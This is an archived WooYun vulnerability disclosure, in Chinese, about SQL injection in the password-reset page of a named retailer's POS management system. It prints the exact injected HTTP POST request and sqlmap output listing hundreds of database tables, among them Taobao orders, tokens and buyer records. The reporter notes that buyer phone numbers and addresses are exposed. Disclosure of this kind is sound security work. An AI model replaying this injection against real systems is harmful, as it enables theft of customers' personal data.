乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-08-18: 积极联系厂商并且等待厂商认领中,细节不对外公开 2015-10-02: 厂商已经主动忽略漏洞,细节向公众公开
从一个pos店铺管理系统重置密码处发现注入,到发现十几裤,分析了下内容,可以实现查看天猫C店各种数据,比如,订单,评价,还有买家信息,电话,地址,这个裤子也很强大。万一找到你家呢。。第二个是自己商品的详细数据,这个也是竞争的利器第三就是各种代理商的数据了,数据量实在太大,只跑部分代表可能实现。http://sap.karra.com.cn/Account/PwdChange.aspx 重置密码处发现SQL注入,
POST /Account/PwdChange.aspx HTTP/1.1Host: sap.karra.com.cnContent-Length: 174Cache-Control: max-age=0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Origin: http://sap.karra.com.cnUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36 SE 2.X MetaSr 1.0Content-Type: application/x-www-form-urlencodedReferer: http://sap.karra.com.cn/Account/PwdChange.aspxAccept-Encoding: gzip,deflate,sdchAccept-Language: zh-CN,zh;q=0.8__VIEWSTATE=%2FwEPDwUKMTA1NDkzNTkwMmRkbdVCy9Kp551SUrWeHfcXBOYLkvS6b79HnY1MNZMILbo%3D&txtUserName=aaaa%27+&txtOPwd=123456&txtNPwd=123456&txtNPwd1=123456&btnSubmit=%CC%E1%BD%BB
数据包
| HS_BORROW || HS_BUMEN || HS_BX || HS_BXNAME || HS_DIANPU || HS_DIANPUBX || HS_KFCKD || HS_KFKC || HS_KFKCMX || HS_MLK || HS_MLMINGXI || HS_MLPRICE || HS_PHDZ || HS_SCDZMX || HS_SCMLDZ || HS_SCMLKMX || HS_YYBORROW || HS_YYGL || HS_YYK || HS_YYKC || HS_YYNO || HS_YYXSXS || HS_YYZK || HS_ZKD || HT_DETAIL || HT_MANAGER || HT_NUM_DETAIL || IMG || IMGURL || IMGURL_TEST || IMG_LOG || IMG_STORE || INFO_TABLE || INSIDE_SALE || ISALOG || JIZHANG_TEMP || JOB_INFO || JOS_REMOVEDETAIL || JOS_REMOVENO || KARRA_LOG || KARRA_PRODUCT || KARRA_PRODUCT_BAK || KARRA_PRODUCT_OLD || KARRA_PRODUCT_XZ || KARRA_TB_ZHANGDAN_BAK || MAXDH || MDIMG || MD_INPUT || MICROSOFTDTPROPERTIES || MLSC || MONTH_REPORT_IT || NEWSALE_BIDUI || NEWSALE_BS_NO || NEWSALE_BS_NO_BAK || NEWSALE_BS_NO_TMP || NEWSALE_BS_STORE || NEWSALE_BS_STORE_BAK || NEWSALE_BS_STORE_TMP || NEWSALE_FDJHCHD || NEWSALE_FDJHCHD_BAK || NEWSALE_FDYHD || NEWSALE_FDYHD_BAK || NEWSALE_FLBFD || NEWSALE_FLSUMSTORE || NEWSALE_FL_STORE || NEWSALE_FXLEI || NEWSALE_HP_DAILYREPORT || NEWSALE_INFO || NEWSALE_JF || NEWSALE_JFBS || NEWSALE_JFKNO || NEWSALE_JF_BAK || NEWSALE_KAOQIN || NEWSALE_KDD || NEWSALE_LIUSHUI || NEWSALE_MAXSTORE || NEWSALE_OTHERBRAND || NEWSALE_OTHERBRANDSALE || NEWSALE_OTHERBRANDSALE_BAK || NEWSALE_PD || NEWSALE_PLSQL_KCBIDUI || NEWSALE_QUAN || NEWSALE_ROAD || NEWSALE_SCHD || NEWSALE_SCHDNEW || NEWSALE_STORELIUSHUI || NEWSALE_STORELIUSHUI_20140320 || NEWSALE_STORELIUSHUI_BAK || NEWSALE_STORELS || NEWSALE_SUMSALE || NEWSALE_SUMSALE_BAK || NEWSALE_SUMSALE_VIP || NEWSALE_SUMSTORE || NEWSALE_SUMSTORE_20130531 || NEWSALE_SUMSTORE_BAK || NEWSALE_SUMSTORE_HB || NEWSALE_SUMSTORE_HB1 || NEWSALE_SYJH || NEWSALE_TASK || NEWSALE_TCBL || NEWSALE_TEST_SUN || NEWSALE_THHSQ || NEWSALE_TJ || NEWSALE_TJ_KC || NEWSALE_TMDD || NEWSALE_TMSUMSTORE || NEWSALE_TM_TMP || NEWSALE_UNITDAILY || NEWSALE_UNITDAILY_BAK || NEWSALE_UNITEMPLOYEE || NEWSALE_UNITEMPLOYEE_BAK || NEWSALE_UNITYEJI || NEWSALE_VIPCARD_VALID || NEWSALE_XXX || NEWSALE_YFK_LIUSHUI || NEWSALE_YFK_NO || NEWSALE_YFK_NO_BAK || NEW_IMG_STORE || NEW_UPDOC || NOOTBOOK || O_STORE || PDINPUT || PD_LIUSHUI_TABLE || PD_SHEET || PD_TAITOU_TABLE || PERSONAL_DAILY_IT || PERSONAL_MONTH_IT || PERSONAL_WEEK_IT || PF_TYPE_CODE || PLAN_GC || PLAN_TABLE || PLOYEE || PLSQL_TEST || PLSQL_TEST2 || PLSQL_TEST3 || POS_NEXTWEEK_CL || POS_SCHD_MD || POS_TASK_RESULT || POS_WEEK_OTHERBRANDSALE || POS_WEEK_RESULTS || PPDETAIL || PRICE_CHANGE || PRODUCT || PRODUCT_IMG || PRODUCT_LIST || PRODUCT_TEMP || QCTZD || REGION_NO || REGION_NODX || REGION_S_NO || REGION_S_NODX || REPAIR || RL_BUMEN || RL_SOURCE || RL_YGXX || ROAD_WARE || SALE || SALESPERSON || SAOMIAO_BARCODE || SAP_CUSTOMER_YD || SAP_CUS_SERS || SAP_CY_BASEINFO || SAP_FH_SEQUENCE || SAP_HDDETAIL || SAP_HUOWEI || SAP_IMAGES_LIST_TMP || SAP_KARRA_QUERY_LOG || SAP_KUNNR || SAP_KUNNR_DUIYING || SAP_LGORT_NAME || SAP_MAIL_SENDSETS || SAP_MARA_PRODUCT || SAP_MATNR_SSPCORDATE || SAP_POS20_KC || SAP_POS20_KC_DETAIL || SAP_POSLOG || SAP_POS_CATCHSQL || SAP_POS_SYNC_DAILY || SAP_POS_TB_WEEK_SALESUM || SAP_PRECARD || SAP_REMOVEDETAIL || SAP_REMOVEDETAIL_TMP || SAP_REMOVENO || SAP_REMOVENO_TMP || SAP_SCHD || SAP_SHENGCHANCAIGOU || SAP_TAOBAO_PINT || SAP_TB_TMP_FDYHSP || SAP_YFKLIUSHUI || SAP_ZMARA || SAP_ZSAP_POS23_TB || SC_IN || SC_OUT || SC_UNSE || SC_USE || SHOP || SMP_VDS_REPOS_VERSION || SMP_VDS_SESSIONS_TABLE || SOFTWARE_USE || STORE_USE || STUDENTS || TAOBAO_ORDER || TAOBAO_REFUND || TAOBAO_TMP_DATA_SEL || TAOBAO_TOKEN || TAOBAO_TRADE || TB_CWJS || TB_FENKU || TB_ORDERLIST || TB_VIP || TB_XSD || TB_ZHANGDAN || TB_ZHANGDAN_BAK || TEMPUTER || TEST || TEST1 || TESTING || TEST_A || TIXING || TM_HZ || TM_JSJUAN || TM_QMX || TM_QUAN || TM_S_NO || TM_VIPARCHIVES || TM_VIPJF || TM_XSD || TNAME_ARG || TOUPIAO || TP_DETAIL || UNIT_NAME || UPLOADLOG || URL_TODAY_IT || USR_FUNCTION || USR_TAB || USR_TAB_BAK || USR_TAB_OLD || VIPLIPIN || VIP_JF || VIP_REGISTER_DETAIL || VIP_REGISTER_DETAIL_BAK || WB_RECEIVE || WB_REMOVE || WB_REMOVE_BAK || WB_SALE || WB_SEND || WEATHER || WEB_IMG || WEB_LINK || WEB_VISIT || WEEK_REPORT_IT || WEIXIN_SENDMSG || WEIXIN_VIP_DUIHUAN_JF || WLDLIUSHUI || WLDLIUSHUI_TMP || WROX_BOOK || WXZKSQD || WX_USE || WX_USE_20130607 || XH_IN || XH_OUT || XH_UNSE || XH_USE || XIUGAI || YF_CW_DAILI || YF_CW_DETAIL || YF_CW_TYPE || YINGYUNBU || YINGYUNBU1 || YYK || YY_BACK || YY_BACK_BAK || ZAIXIAN || ZHIDU || ZKSQD || ZK_CARDNO || ZK_S_NO || ZK_S_NO2 || ZLK_DUIYING || ZLK_OUTIN || ZLK_PRODUCT || ZLK_USE || ZSAP_SYNC_PD_DATA || ZWD_KC || ZWD_PRO || ZWD_SALE || ZZ_IN || ZZ_USE || ZZ_USEBAK |+-------------------------------+[10:59:54] [WARNING] HTTP error codes detected during run:500 (Internal Server Error) - 379 times[10:59:54] [INFO] fetched data logged to text files under 'C:\Users\k\.sqlmap\otput\sap.karra.com.cn'
当前库子部门表,实在太多了。而且名称很难猜是代表具体什么内容。。
未能联系到厂商或者厂商积极拒绝
